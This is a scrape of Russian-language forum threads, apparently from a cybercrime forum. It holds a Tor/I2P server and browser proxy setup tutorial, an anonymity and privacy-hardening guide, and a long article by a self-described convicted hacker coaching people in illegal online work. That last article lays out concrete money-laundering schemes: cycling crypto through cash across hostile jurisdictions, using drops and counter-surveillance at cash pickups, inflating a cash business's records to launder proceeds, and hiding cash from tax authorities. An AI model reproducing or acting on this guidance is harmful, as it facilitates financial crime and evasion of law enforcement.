clientApp.2.delay=120
clientApp.2.startOnLoad=true
clientApp.3.main=net.i2p.jetty.JettyStart
clientApp.3.name=I2P webserver (eepsite)
clientApp.3.args="/home/asdf/i2p/eepsite/jetty.xml"
clientApp.3.delay=30
clientApp.3.startOnLoad=false
clientApp.4.main=net.i2p.apps.systray.UrlLauncher
clientApp.4.name=Open Router Console in web browser at startup
clientApp.4.args=http://127.0.0.1:7657/
clientApp.4.delay=3
clientApp.4.startOnLoad=false
clientApp.5.main=net.i2p.BOB.BOB
clientApp.5.name=BOB application bridge
clientApp.5.delay=10
clientApp.5.startOnLoad=false

За описанием опций - в ман или гугл. Вкратце: отключаем IPv6, автозапуск встроенного вебсервера (clientApp.3) и панели роутера (clientApp.4).

Любимым редактором редактируем файл i2prouter, ищем в районе 69 строки

Code:Copy to clipboard

#RUN_AS_USER=

меняем на

Code:Copy to clipboard

RUN_AS_USER=asdf

Выходим из юзера asdf обратно под рута, запускаем I2P и добавляем в автозапуск:

Code:Copy to clipboard

exit;
cp /home/asdf/i2p/i2prouter /etc/init.d/
service i2prouter start
chkconfig i2prouter on

Это еще не всё, надо будет настроить I2P роутер через его веб-админку, но для начала расшарим Tor и I2P наружу, разрешив доступ к ним только с определённых IP, я для этого использую xinetd.

Удаляем дефолтные конфиги (проверьте, что сейчас сидите под рутом),

Code:Copy to clipboard

id
rm -rf /etc/xinetd.d/

и создаём свой /etc/xinetd.conf любимым редактором. Не забудьте изменить значения в полях port, чтобы разные жулики не насканили ваш I2P по стандартным портам. Можно оставить мои порты, но жулики будут сканить и по ним
Порт 443 для тора, имхо, можно оставить.
Конфиг /etc/xinetd.conf:

Code:Copy to clipboard

defaults
{
 user = nobody
 group = nobody
 log_type = FILE /dev/null
 log_on_success = HOST PID
 log_on_failure = HOST
 only_from = localhost 127.0.0.1 222.222.222.222 13.13.13.13
}
service torsocks
{
 type = UNLISTED
 socket_type = stream
 protocol = tcp
 wait = no
 user = nobody
 bind = 222.222.222.222
 port = 443
 redirect = 127.0.0.1 443
}
service i2padmin
{
 type = UNLISTED
 socket_type = stream
 protocol = tcp
 wait = no
 user = nobody
 bind = 222.222.222.222
 port = 17657
 redirect = 127.0.0.1 7657
}
service i2phttp
{
 type = UNLISTED
 socket_type = stream
 protocol = tcp
 wait = no
 user = nobody
 bind = 222.222.222.222
 port = 24444
 redirect = 127.0.0.1 4444
}
service i2phttps
{
 type = UNLISTED
 socket_type = stream
 protocol = tcp
 wait = no
 user = nobody
 bind = 222.222.222.222
 port = 34445
 redirect = 127.0.0.1 4445
}

Не забудьте проверить, что вместо условных "222.222.222.222" и "13.13.13.13" вы прописали нужные IP.

Включаем xinetd:

Code:Copy to clipboard

service xinetd restart
chkconfig xinetd on

Теперь заходим в админку I2P роутера, сначала на страницу Configuration - Clients _http://222.222.222.222:17657/configclients
обязательно устанавливаем пароль для входа на роутер! Ставим галку "Require username and password", заполняем Username и Password, тыкаем Save Client Configuration.
Теперь сделаем пошире канал: _http://222.222.222.222:17657/config
для обычного сервера с подключением 100мбит можно указать 1000 KB/s In и Out, все равно выше 1 Mb/s I2P не разгоняется Доля транзитного трафика в 80% достаточна для нормального использования.
Также нужно отключить автозапуск ненужных туннелей (например, IRC, SMTP, POP3) здесь _http://222.222.222.222:17657/i2ptunnelmgr
кликаем на имя ненужного туннеля, убираем галку с "Auto Start(A)" на открывшейся странице, и Save(S) внизу страницы.
Походите еще по вкладкам в настройках, там много интересного _http://222.222.222.222:17657/config

Для применения настроек нужно перезагрузить роутер, нажмите Restart в левом меню.

--- Настройка сервера завершена, переходим к локалхосту ---

Сохраняем куда-нибудь proxy auto config файл:

Code:Copy to clipboard

function FindProxyForURL(url, host) {
 //// proxy servers:
 tor = "SOCKS 222.222.222.222:443";
 i2p = "PROXY 222.222.222.222:24444;";
 i2ps = "PROXY 222.222.222.222:34445;";
 mysock = "SOCKS 11.22.33.44:1080";
 white = "DIRECT";

 //// do not use socks when connecting to server itself:
 if (shExpMatch(host,"222.222.222.222")) {
  return white;
 }

 //// do not use socks when connecting to local nets
 if (shExpMatch(host, "*.local") || isInNet(host, "10.0.0.0", "255.0.0.0") || isInNet(host, "172.16.0.0", "255.240.0.0") || isInNet(host, "192.168.0.0", "255.255.0.0") || isInNet(host, "127.0.0.0", "255.255.255.0")) {
  return white;
 }

 //// use tor socks when connecting to .onion domains:
 if (shExpMatch(host,"*.onion")) {
  return tor;
 }

 //// use i2p socks when connecting to .i2p domains:
 if (shExpMatch(host,"*.i2p")) {
  if (url.substring(0,6)=="https:") {
   return i2ps;
  } else {
   return i2p;
  }
 }

 //// different ways to connect to white internets:
 return mysock; // to use socks proxy
 //return tor; // to use tor
 //return white; // to use vpn only (VERY BAD)
}

где 11.22.33.44:1080 - какой-нибудь стабильный сокс, например, SSH- туннель к VDS или к роутеру в далёкой стране.
Если у вас нет подходящих соксов, можете заюзать свой же сервер, подняв SSH- туннель на локалхосте

Code:Copy to clipboard

ssh -D 12345 -N root@222.222.222.222

и изменив в PAC файле строку mysock на

Code:Copy to clipboard

 mysock = "SOCKS 127.0.0.1:12345";

- тогда в случае чего спалится этот сервер, а не ваш впн.

Обратите внимание на нижние строки, return mysock рекомендую для хождения по надёжным форумам и другим сайтам, привязывающим сессию к IP, return tor рекомендую для хождения по неблагонадёжным сайтам, где пофиг на сессию (IP будет периодически меняться, т.к.трафик будет идти через Tor), и return white вообще не рекомендую (это ведёт к возможному раскрытию вашего реального IP, т.е. IP вашего VPN)

Открываем Firefox, идём в Tools -> Add-ons -> Extensions, ищем и устанавливаем NoScript (обязательно!) и Adblock Plus (желательно), если вы этого еще не сделали раньше
Открываем в другом браузере https://rdot.org/forum/showthread.php?t=2229 и скачиваем оттуда плагин для смены User-Agent. Устанавливать в Firefox обязательно! Не ходите по Tor/I2P сайтам со своим обычным юзерагентом!

Теперь идём в Edit -> Preferences -> Advanced -> Network -> Settings и выбираем там нижный пункт Automatic proxy configuration URL
Указываем там путь к файлу, типа file:///home/h4x0r/pacpac.pac для линукса (там три слэша, т.к. URI = file:// плюс путь к файлу от корня /) или file://C:\Users\h4x0r\Desktop\pac.txt для венды, жмём OK. После правок файла не забывайте заходить в эту настройку и жать кнопку Reload.

Теперь открываем в адресной строке about:config и меняем параметр network.proxy.socks_remote_dns на true - тогда фаерфокс при использовании socks-прокси будет использовать его DNS сервер, соответственно, при использовании PAC файла для поиска доменов .i2p/.onion будет использоваться наш DNS.
Если на локалхосте линукс, то любимым редактором из-под рута правим /etc/resolv.conf и прописываем там наш DNS для других приложений, просто чтобы не палить провайдеру/гуглу, на какие домены мы ходим:

Code:Copy to clipboard

nameserver 222.222.222.222

Если на локалхосте винда, но правим днс в настройках сетевого соединения: http://windows.microsoft.com/ru-ru/windows...tcp-ip- settings прописываем 222.222.222.222 в "Использовать следующие адреса DNS-серверов"

Закрываем фаерфокс, убеждаемся, что он действительно закрыт, методом killall firefox (иногда при использовании соксов он виснет при закрытии), запускаем, идём в Tools -> Default User Agent -> выбираем рандомный юзер-агент.
Готово - теперь вы будете сёрфить Tor и I2P намного безопаснее, чем при использовании локальных Tor или I2P роутеров

При использовании "обычных" сайтов желательно менять юзерагент на стандартный и отключать соксы, выбирая в Edit -> Preferences -> Advanced -> Network -> Settings параметр "No proxy"

Если кто знает, как заставить другие браузеры (особенно интересует opera) резолвить домены удалённо (аналог опции network.proxy.socks_remote_dns в Firefox) - подскажите, буду благодарен. Пользоваться Google Chrome (и особенно Srware Iron) не советую по причине принадлежности гуглу первого, и закрытого исходного кода второго.

Подробная статья об анонимности

ID: 676533bbb4103b69df371936
Thread ID: 44268
Created: 2020-11-13T08:16:48+0000
Last Post: 2024-09-05T11:39:16+0000
Author: KERNELRW
Prefix: Статья
Replies: 74 Views: 18K

ОС
Начнём с выбора ОС, в основном это дело вкуса, для тех кому важен большой набор предустановленных инструментов и иллюзия полной анонимности рекомендую UNIX-систему Kodachi, а сам же я предпочитаю Windows 10. Лучше всего скачать дистрибутив, почищенный от телеметрии и ненужных приложений, например, [отсюда](https://windows64.net/215-windows-10-pro-2020-compact-1909-x64-x86-na- russkom.html), либо поищите самостоятельно последнюю версию Windows 10 Lite или Compact.
После установки скачиваем https://github.com/aghorler/Windows-10-Hardening с гитхаба и запускаем all.bat от имени администратора. Затем скачиваем https://github.com/Wohlstand/Destroy-Windows-10-Spying/releases и настраиваем на своё усмотрение. Блокировка серверов Microsoft в файле hosts приведёт к тому что Microsoft Store и Skype не будут работать.
Скачайте и установите ТОР-браузер, запускать после установки не нужно, затем скачайте ProxAllium, выберите папку «Tor Browser» и настройте автозапуск: Options > Startup > Automatically start, Start minimized.
Затем установите ваш любимый VPN и в настройках укажите прокси-сервер: IP 127.0.0.1, порт 9050, тип – Socks5.

Браузер
Для обеспечения полной анонимности лучше всего использовать современный антидетект-браузер: выбираем худший.
Но я буду использовать Firefox в виду его надёжности, комфортности и гибкости в настройке.
В браузере устанавливаем плагины AdGuard AdBlocker, Ghostery, Privacy Pass, Clear Cache, Cookie AutoDelete, Canvas Blocker, Disable WebRTC.
Заходим в настройки > Приватность и защита > Строгая. Прокручиваем ниже, отключаем все ненужные разрешения.
Затем ниже отключаем телеметрию и запрещаем собирать данные. Не забывайте отключать телеметрию во всех программах которые вы устанавливаете на свой компьютер.

Spoiler: about:config

Эти настройки могут сломать возможность установки новых плагинов, позаботьтесь о них прежде.

Заходим на about:config и меняем настройки:

Самая главная опция
privacy.firstparty.isolate = true

Отключаем WebRTC
media.peerconnection.enabled = false

Отключаем WebGL
webgl.disabled = true

Запрещаем передачу сайтам подробной информации о графических возможностях системы
webgl.disable-extensions = true
webgl.min_capability_mode = true

Опция включает защиту от отслеживания
browser.contentblocking.enabled = true

Опция предназначена для передачи информации о нашем местоположении
geo.enabled = false

Отключаем передачу информации о посещаемых веб-сайтах
safebrowsing = false
browser.safebrowsing.enabled = false
browser.safebrowsing.phishing.enabled = false
browser.safebrowsing.malware.enabled = false
browser.safebrowsing.downloads.enabled = false

Отключаем передачу браузером информации о времени начала и окончания загрузки страницы
dom.enable_performance = false

Отправлять DNS-запросы через прокси при использовании прокси. Иначе они пойдут напрямую и могут привести к раскрытию реального IP-адреса (DNS leak)
network.proxy.socks_remote_dns = true

Запрещаем отслеживать состояние батареи и тем самым получать информацию
dom.battery.enabled = false

Запрещаем сайтам обращение к локальной машине
network.proxy.no_proxies_on = (пустое значение)

Полное отключение кэширования
browser.cache.disk.capacity = 0
browser.cache.disk.enable = false
browser.cache.disk.smart_size.enabled = false
browser.cache.disk_cache_ssl = false
browser.cache.memory.enable = false
browser.cache.offline.capacity = 0
browser.cache.offline.enable = false
dom.indexedDB.enabled = false
media.cache_size = 0
network.http.use-cache = false

Отключаем возможность сайтов хранить некоторые настройки
dom.storage.enabled = false

Отключаем автоматическое обновление браузера
app.update.auto = false
app.update.enabled = false
app.update.mode = 0

Отключаем автоматическое обновление поисковых плагинов
browser.search.update = false

Не отправлять данные о производительности в Mozilla
datareporting.healthreport.service.enabled = false
datareporting.healthreport.uploadEnabled = false
datareporting.policy.dataSubmissionEnabled = false

Поисковик смените на DuckDuckGo (start.duckduckgo.com).

Почта
Зарегистрируйте почту на tutanota.com. Их защита от ботов может отказать в регистрации с первого раза или с плохого VPN. Без VPN в России сервис не работает. Protonmail – не защищённый сервис.

Телефон
Выключите сохранение местоположения в настройках камеры.
На Android установите и запустите Orbot не в режиме VPN. Затем установите свой любимый VPN, он должен поддерживать прокси и выбор отдельных приложений. Если таких функций нет – установите OpenVPN и найдите на сайте VPN'а инструкцию по настройке OpenVPN-клиента (иногда находится в инструкциях для роутеров). Теперь можете настроить прокси 127.0.0.1:9050 и выбрать приложения для которых нужен VPN. Остальными приложениями и соц. сетями можно спокойно пользоваться как и раньше. Если вы очень смелый.
Самое главное правило – вы не занимаетесь ничем интересным, ни для друзей, ни для близких, ни для девушки/парня, ни даже если вы познакомились с кем-то, кто занимается. Лучше очень удивитесь такому раскладу и никогда больше не контактируйте с этим человеком. Нам, добропорядочным людям, не стоит с такими иметь дело.
Если же у вас iOS – используйте NordVPN, обязательно с сервером Onion over VPN, удалите все соц. сети.

Телеграм
Регистрируйтесь в телеграме только на левый номер. Его можно получить бесплатно в TextNow ([приложение](https://apkpure.com/textnow-free-texting-calling- app/com.enflick.android.TextNow)) только через USA VPN либо купить номер в любом смс-сервисе и позаботиться о том чтобы он не потерялся.
Обязательно установите пароль в настройках аккаунта.
Не забывайте что телеграм – централизованный сервис, который имеет техническую возможность раскрыть ваши данные.

Jabber
Самый лучший десктоп-клиент – Pidgin, iOS – ChatSecure, Android – Conversations (разрешите установку apk из неизвестных источников).
Не доверяйте exploit.im и thesecure.biz. Выбрать Jabber-сервер можно здесь: https://list.jabber.at/.
Зарегистрировать новый аккаунт можно либо на сайте нужного сервера, либо прямо в Jabber-клиенте выбрать регистрацию, ввести сервер, желаемый логин и пароль.

Платежи
Для анонимных платежей используйте HD BTC-кошелёк со сменяющимися адресами. Почему адреса должны меняться? Если при получении платежей вы всегда используете один и тот же адрес, то можно с лёгкостью отследить всю историю ваших транзакций. Метод генерации адресов усиливает конфиденциальность, автоматически предоставляя вам новый адрес, когда вы ожидаете поступление средств.
Для более серьёзной анонимности операций нужно использовать zCash, не Monero. Транзакции можно проводить только со специального «z-адреса», и с них взымаются высокие комиссии.

Не самая плохая статья по безопасности :)

ID: 676533bbb4103b69df3718ed
Thread ID: 96722
Created: 2023-08-28T07:24:29+0000
Last Post: 2024-12-12T19:02:37+0000
Author: darkcoder_io
Prefix: Статья
Replies: 209 Views: 18K

[^\s]

Не самая плохая статья по безопасности

1. Картинок не будет, кода тоже.
2. Там, где вы учились — мы преподавали.
3. Безопасность никогда не бывает удобной.

**ТОМ ПЕРВЫЙ: ЛОГИЧЕСКИЙ (может будет еще второй, технический, если меня не закидают помидорами за этот)

ИНТРО**

Я не хочу как то выделяться из толпы, рекламировать себя, стараться казаться выше или ниже, чем я есть — если вам так показалось из-за моего, достаточно специфического стиля изложения, — то вам просто показалось. У меня за плечами более 30 лет работы, я привлекался по ст. ст. 272 ч2, 273 ч2, 165 ч2, так что некоторый опыт имеется и сообщаю я вам о нем не понта ради, а чтобы вам было немного понятнее, что большое видится издалека и со временем. Я не претендую на истину в последней инстанции, однако надеюсь, что данный материал кому-то будет полезен (и, что самое главное, сумеет кого-то из вас уберечь от тюрьмы; хоть от этого и не принято зарекаться).

Безопасность — это вкусный слоеный пирог. Ни один из слоев не работает без другого. Эта штука работает ТОЛЬКО КОМПЛЕКСНО, и подход к ее обеспечению у вас должен быть именно КОМПЛЕКСНЫЙ. Иначе, какой смысл ставить бронированную (как в банке) дверь и держать при этом открытым окно? Вкусим же этот пирог)

ЧАСТЬ ПЕРВАЯ: СОЦИУМ

Золото или кровь?

Золотое правило номер 1: не болтай.
Золотое правило номер 2: понт — твой враг.
Золотое правило номер 3: живи и работай в больших городах.

Деньги, как известно, любят тишину. А большие деньги — мертвую тишину (об этом подробнее можно поговорить в статье про криптомиллионеров, преждевременно склеивших ласты). Я помню пару случаев из жизни, которые наглядно вам покажут как делать не надо.

Случай первый. Жил да был Вася. Учился на трояки, прогуливал пары в универе, одним словом был типичным распиздяем. Однако, Васе был не чужд привлекательный мир только формировавшегося тогда IT, чем он и поспешил воспользоваться. Надо сказать, что Вася был не обделен интеллектом и вся эта компьютерная хренотень давалась ему достаточно легко. Я намеренно опущу детали и подробности того, чем именно он занимался, но все с финансовой точки зрения было у него хорошо. По крайней мере, в то время как большинство еле-еле наскребало пятеру чтобы "занести" в универе за наиболее трудные экзамены, Вася с легкостью заносил 30к прямо в зачетке декану. Сервис, ага. Шло время и Вася в моменте осознал, что хрена ли сидеть дома, если можно "осваивать" город. И понеслось, клубы, рестораны... Все как у всех. Васю понесло, ведь в городе всегда было достаточно мажорья и прочих "друзей", готовых быть с кем угодно, пока у последнего есть деньги. Деньги у Василия были. Много. Пьянки, гулянки, кутеж- мутеж... Добавились девчонки. Вася решил, что он стал суперзвездой местного андерграунда и... начал болтать, по синему делу рассказывая, какой он невъебенный хакер и в подробностях описывая свои последние цифровые подвиги. Компания, радостно примкнувшая тусоваться с Васей за его счет, была в разработке у соответствующих служб, и внутри тусовки были агенты, которые не менее радостно воспользовались Васей для продвижения по карьерной лестнице. Вася сел.

Случай второй, год примерно эдак 2004. Небольшая группа других предприимчивых студентов нашла "тему" и начала эту тему достаточно активно эксплуатировать. В карманы ребят со звоном посыпались чеканные монеты (кто из вас не помнит тот звук из аппа WM?). Ну а дальше... Дальше все просто — ошалев от бабла, товарищи студенты начали активно скупаться, совершив свою первую и последнюю, самую фатальную ошибку. В ход пошло все, начиная от качественного шмота и дорогих аксессуаров, продолжая телками в самых дорогих кабаках города, заканчивая машинами и квартирами. Одних новых кайенов было куплено, если мне не изменяет память, не менее трех штук. Примерно аналогично ситуация обстояла с квартирами. Закончилось все достаточно закономерно: про группу практически моментально узнали сотрудники ФСБ, дело происходило в относительно небольшом (пару миллионов населения) городе, и студентов не то чтобы взяли в оборот, нет. Их просто дернули прямо с пар в универе, посадили в машины и привезли в региональное управление ФСБ по одной из областей, где все друзья товарищи во первых строках перекрестно заложили друг друга, а во вторых сдали все что знали. Основные действующие лица сели, часть отмазали родители.

Мораль. А что мораль? Она вынесена в золотые правила в начале этой части. Или, может быть правильнее было бы сказать — кровавые правила. Не надо болтать направо и налево, не надо выделяться из толпы дорогими игрушками, и особенно не надо делать все это в маленьких городах, где мало того, что каждая собака друг друга знает, так еще и порог тех самых понтов крайне низкий. Я намеренно упустил пару технических моментов из задержания этих дурачков, о них я расскажу дальше. Живите двумя разными жизнями, прямо как супергерои в кино. Никто, я повторяю, никто не должен знать о вашей работе (под работой мы понимаем вашу серую или черную деятельность в Сети) — ни мама с папой, ни брат с сестрой, вообще абсолютно никто. И к этому моменту мы тоже вернемся чуть далее, буквально в следующей части.

ЧАСТЬ ВТОРАЯ: ДЕНЬГИ

Золотое правило номер 1: "жадность фраера сгубила".
Золотое правило номер 2: думай как твой противник.
Золотое правило номер 3: KYC — твой враг.

Я намеренно разделил первый том в виде частей по убыванию их значимости. И, сюрприз, на втором месте нифига не эти ваши VPNы. На втором месте бабло, ибо именно оно спалит вас скорее всего. Как? Щас расскажу. Представьте себе некий идеальный мир, в котором ваша жопа надежно прикрыта технологической виртуальной бронеплитой и отследить вас онлайн решительно невозможно. Представили? Отлично, так бывает, я потом даже расскажу как это сделать. Как вы думаете, что будут делать ваши трехбуквенные оппоненты? "Видит око, да зуб неймет", угу. Будут пытаться: а) втереться в доверие под любым предлогом, б) вывести на встречу IRL, в) пытаться у вас что-то купить или, наоборот, продать. А все почему? Правильно, потому что у денег ЕСТЬ СЛЕДЫ. У любых, как у фиатных фантиков, так и у крипты.

Итак, вы заработали денег и вам их выплатили в крипте. Вопрос первый — выплатили куда? Худшее, что вы можете сделать, это держать деньги на горячих кошельках (т.е. на бирже), этот кошелек вам не принадлежит (даже не смотря на то, что у вас от него есть сид фраза). Чуть более оптимально — хранить на холодном кошельке (какой именно не важно; это может быть Ledger, Trezor или виртуалка с каким-нибудь Exodus), решать вам. Еще лучше — не хранить в крипте вообще. По ряду причин. Первая: если это крипта, то она подвержена волатильности (колебаниям курса), вам в эту игру не надо играть, поверьте. Многие из вас были маленькими и не помнят, но мы как то проснулись, а доллар уже не 6 рублей... Так ведь есть стейблкоины, скажете вы? Ога, есть. Только вот с ними тоже проблема — тот же не к ночи помянутый USDT блочат направо и налево (спросите админа). Что же делать, как же быть... Ну что делать, выводить в кэш. Но это не конец, это только начало.

Поскольку эти самые цифровые фантики (крипта) вам в реальной жизни в х#й не тарахтели (правильно, вам нужен доллар США, или рубль РФ, или что вы там у себя на местности юзаете), то их надо окэшить. И тут начинается увлекательная движуха. Основных способов выйти в кэш три — это биржи, автоматизированные обменники и специально обученные люди (я позже поясню, почему я их разделяю). И чтобы ваша жопа не дай бог не полыхнула ядерным огнем, не лишним будет описать работу со всеми тремя. Погнали.

= БИРЖИ.

У этих централизованных сволочей есть явление под названием KYC (Know Your Customer). Это крайне поганая штука, которая заключается в том, что биржа с вами работать не будет, пока не начнет почти буквально "узнавать вас в лицо". Документы загрузи, лицом в камеру посвети, счет банковский привяжи и так далее. Годится только для белых тем (и не забудьте про налоговую!), ЛИБО если вся эта конструкция оформлена на дропа (и то, я в такую игру играть тоже не советую; особенно если вы не умеете работать с дропами). Не ваш способ, биржи идут в лес.

= АВТОМАТИЗИРОВАННЫЕ ОБМЕННИКИ.

Тут для вас кроется основная опасность. Я не возьмусь сказать какая часть из этих обменников лежит под ментами или фейсами. Какие-то с ними плотно играют в одну игру, какие-то и вовсе им принадлежат. Для вас достаточно знать о том, что у вас имеются совершенно ненулевые шансы на такой обменник попасть. А теперь, возвращаемся к желанию ваших оппонентов вас поймать. Если транза пройдет на любом дружественном и/или подконтрольном им обменнике — они будут знать, куда именно вышел кэш. Тут у вас есть два варианта.

1. Вы выводили на свою карту, либо на карту мамы, папы, брата, сестры, друга, не важно. Все — вам пиздец.

2. Вы выводили на карту дропа. Тут могут быть варианты. Если вы светили в камеру банкомата своим лицом — вам пиздец. Если вы не светили в камеру банкомата своим лицом, но снимали кэш более 2-3 раз, находясь при этом в разработке и имея при себе включенную мобилу и/или передвигаясь на машине — вам пиздец.

3. На карту выводил сам дроп. Если вы оба с дропом не олени, — это достаточно безопасный вариант. Но ТОЛЬКО если вы умеете работать с дропами, не светите ему лицо/голос итд.

= СПЕЦИАЛЬНО ОБУЧЕННЫЕ ЛЮДИ (ПРИВЕТ, ЛАНДРОМАТ)

Дисклеймер: описанное ниже — есть выстраданная своим и чужим опытом необходимость при работе на суммах от 100К и чтобы дальше спать спокойно. Вы можете скипать любые части этой схемы, которые кажутся вам чрезмерными или ненужными, но при модификации схемы потом не плачьте, что что-либо пошло не так и не туда.

Я уже писал на форуме о том, что крипту надо рвать в кэш. Но там в комментариях было особо негде развернуться, поэтому я тут остановлюсь более подробно.

Итак, что значит "рвать в кэш". Обычно, ваша типовая транзакция выглядит так: крипта — обменник — кэш. Так делать не надо. Надо вот так: крипта — обменник1 — кэш1 ((микс)) кэш2 — обменник2 — крипта. Рвать в кэш нужно ОБЯЗАТЕЛЬНО с учетом ГЕОПОЛИТИКИ! Да да, именно так и никак иначе. Если вы живете в России, то рвите в кэш работая с людьми в Европе или США. Живете в Европе или США, работайте через Россию. Ну и так далее, принцип я думаю ясен. Чем хуже отношения между страной разрыва в кэш и страной назначения отмытой крипты — тем целее будет ваша жопа. Однако, на этом ничего не заканчивается. В цепочке "надо вот так" финальный пункт (если вы обратили внимание) — НЕ кэш, а опять крипта. Это значит, что крипта сделала круг, почистилась, отсекла "хвост" в виде оперов и прочих AML-дрочеров и должна вернуться к вам на ОТДЕЛЬНЫЙ ХОЛОДНЫЙ КОШЕЛЕК, созданный ТОЛЬКО для этих целей. Далее, у вас есть два варианта: а) вывести на свой акк в бирже (и сесть на 20 лет, в случае если никакого отмыва не было, а вас наебали (привет чувакам, которые наторговали SSN/DOB на $19M)), либо выводить окончательно в кэш уже у вас на местности.

Так как моя рекомендация вам — не доверять ВООБЩЕ никому, то лишний слой защиты лишним не бывает. А посему, вы делаете вот что. Находите на местности людей, которые готовы в кэш (подчеркну, именно людей, а не автоматизированное мусорское говно). Далее, увы, вам будет нужен свой дроп, который заберет кэш. Как и где вы его найдете — я в рамках этой статьи учить не буду. Предположим, он у вас есть. Сливаете чистую крипту в обмен, вам дают либо адрес закладки (у нас это обычно ячейки хранения на вокзале), либо адрес встречи. Если работа с людьми впервые — то вне зависимости от типа встречи, вы идете на нее с группой поддержки (иначе есть риск попрощаться с баблом). Далее. Если это закладка, то инструктируете дропа забрать закладку и следовать вашим указаниям (одноразовая труба с левой симкой, только смс, никакого голоса). Дроп должен отъехать от места закладки, вы должны отъехать с ним вместе (на небольшом расстоянии). Задача группы поддержки — попытаться выявить хвосты (если таковые имеются) и проинформировать об этом вас. Далее у дропа забираете пакет. Если это встреча — аналогично, дроп забирает пакет, перемещаетесь оттуда, если все ок, забираете деньги. Дропов желательно периодически менять, если дропа вычислят — вам пиздец.

P.S. С собой на местности полезно иметь портативные электронные весы, чтобы взвесить кэш (нужно заранее спросить, какими купюрами выдадут).

Тут на самом деле можно на отдельную статью материала рассказать, всего сразу не упомнишь. Но моя задача дать вам основы, основы я дал, употребляйте правильно.

А, вы думали история с баблом закончилась и теперь можно покупать порш? Нихуя. Читаем дальше.

И вот, у вас в руках отмытый кэш. Я не буду касаться нищеебов, да простят меня оные. Посему, логика рассуждений будет чуть иная. В наших краях, с нашими доходами и нашей валютой, $100к обычно отдаются 10 пачками по $10к и весит сумка примерно около килограмма. Выдача "вразнобой", купюрами разного номинала карается анально и так обычно не делают, но лучше уточнить заранее и прикинуть вес; ибо пересчитывать на улице вы точно не будете. Ура, вожделенное бабло. Что дальше? А дальше — тратить нельзя. Никак. Вообще. Нет, ну если у вас стальные яйца и железная воля, вы (разумеется) можете пойти в ресторан, хорошо поесть, купить себе костюм, не слишком дорогие часы, или там, условно, айфон. Затраты такого рода закончатся у вас ОЧЕНЬ быстро и вам захочется больше. А именно — дорогие машины и дорогая недвижимость. И вот тут для вас кроется финальная опасность, которую я сейчас расскажу как преодолеть.

Дело в том, что ни в одной стране мира налоговая не дремлет, и вообще не зря ест свой хлеб с маслом. Как только вы покажете расходы выше доходов — вам пиздец. Далее я буду рассказывать на примере США, но уверен, что и в России история примерно похожая. У нас в штатах, если ты придешь в автосалон с сумкой кэша — это ЧП, там все охуеют. Потому что а) ни у кого нет столько кэша, б) не принято делать крупные покупки за кэш, и в) под кэшем в контексте крупных покупок вообще понимается БАНКОВСКИЙ ПЕРЕВОД, т.е. НЕ КРЕДИТ. Нет, разумеется, у вас этот кэш радостно возьмут, мило улыбаясь все оформят, выдадут вам ваш новый порш и вы уедете. Вот только СРАЗУ ЖЕ эта информация поступит в IRS и в ближайшее время у вас состоится принудительная беседа на тему "откуда деньги, Зина?".

Чтобы не присесть голой жопой на налоговую бутылку, надо быть умнее. Тарам- пам-пам, на сцену выходит... весь такой в белом, БИЗНЕС. О, это мой самый любимый момент! Вопрос не в том, что эти уроды подозревают, вопрос в том, что они могут доказать. А доказать они ничего не могут. Предположим, у вас есть друг, брат, сват, зять, жена, подован, похуй кто. Этот прекрасный человек открывает абсолютно любой тип бизнеса, в крупном городе (это обязательное условие). Главное, чтобы природа этого бизнеса позволяла принимать кэш. Дальше начинается совершенно банальнейший отмыв денег. Например, мальчик Ашот оказывает услуги выездного клининга (опять же на примере нашей местности). Средний чек за один такой вызд равняется $200. В день Ашот может сделать 6 выездов. На практике из-за долбоебизма сделает 5, а в отчетность мы напишем 8. Таким образом, $600 отмыты. У нас трудится 20 таких Ашотов, которые за сутки отмывают $12000. Вроде и мало, вроде и не мало... Не понятно. Моя задача показать вам логику. А таких бизнесов может быть 38 в разных штатах/областях/направлениях. Тут есть два момента — во первых поток кэша не контролируется, во вторых этот кэш развивает бизнес, в третьих этот бизнес вас в итоге кормит. Вот и получаетесь вы, такой серый кардинал... На порше. Откуда порш? Ну как же, я нищееб, жена подарила (в кредит на компанию оформлено), она у меня вон какая успешная.

Главная мораль этой части: не экономить на комиссиях и потерях; не грубить с соотношением честного/отмываемого кэша в бизнесе. Я знаю как минимум несколько случаев в духе "ой, нафига платить Х за разрыв, чето дорого, заплачу ка я Y на соседнем форуме". И привет жопа, сели все. Ваша свобода стоит этих расходов, а кушать хотят все.

P.S. Ложка говна в бочке меда: налоги придется заплатить. Такова цена спокойного сна на свободе.
P.P.S. Кэш может скапливаться быстрее, чем вы будете успевать его отмывать, это нормально. В таком случае, вам понадобится промышленный вакууматор и фантазия для придумывания места хранения кэша. Не хранить все яйца в одной корзине! Прятать пакетами по $10K в РАЗНЫХ местах. Отлично работает пара собственных ипотечных квартир с фальш-стенами и прочими тайниками. В штатах хорошо работают стораджи, в РФ — гаражи.

Едем дальше.

ЧАСТЬ ТРЕТЬЯ: ЛИЧНОСТЬ И ЖЕЛЕЗО.

Золотое правило номер 1: разделять железо.

Помните, я выше говорил, что ни одна собака не должна знать чем вы занимаетесь? Теперь чуть коснемся аппаратной составляющей этого вопроса. Значица, самым ходовым инструментом мусоров является фингерпринтинг (связь щас не трогаем пока). Я уже подустал нажимать кнопки, вы и сами знаете че это такое (кто не знает, сходите в гугл). Отсюда проследует банальный вывод: разделение вашей личности номер 1 (тот, кого все знают) и вашей личности номер 2 (тот, кем вы РАБОТАЕТЕ В СЕТИ), должно происходить на АППАРАТНОМ УРОВНЕ. Иными словами, для вас как Ивана Иванова с соцсетями, почтой и прочим говном — набор железа номер 1 (десктоп, ноут, мобилки); для вас, как для darkcoder_io — набор железа номер 2 (один или два ноута).

ЧАСТЬ ЧЕТВЕРТАЯ: СВЯЗЬ

Золотое правило №1: не работать из дома; не работать через домашний интернет.
Золотое правило №2: не иметь рабочей мобилки.

Ну шо, дети, вы таки еще не устали? Мы наконец-то добрались до ваших любимых галлюцинаций, что VPN вам поможет и никто вас не поймает. Не поможет. Поймают. А теперь по порядку. Обратите внимание! Во втором наборе железа нет мобилок. Почему? Потому что если вы, как тупые адвокаты, будете передвигаться с двумя мобилами одновременно — увязать вас воедино, в один "профиль" — задача пяти минут. Никаких блядских виртуалок и прочей экономии. Разное железо! Только так и никак иначе. И это железо НИКОГДА не должно пересекаться НИКАК, и НИКОГДА не должно подключаться к одной сети. Более того, рабочую машину дома НЕ ВКЛЮЧАТЬ! Если включаете, у нее заблаговременно (на этапе сетапа) должен быть ОТКЛЮЧЕН вайфай — окружающий вас набор сетей вайфай сдеанонит вас до дома на счет "раз".

== ВЫХОД В СЕТЬ.

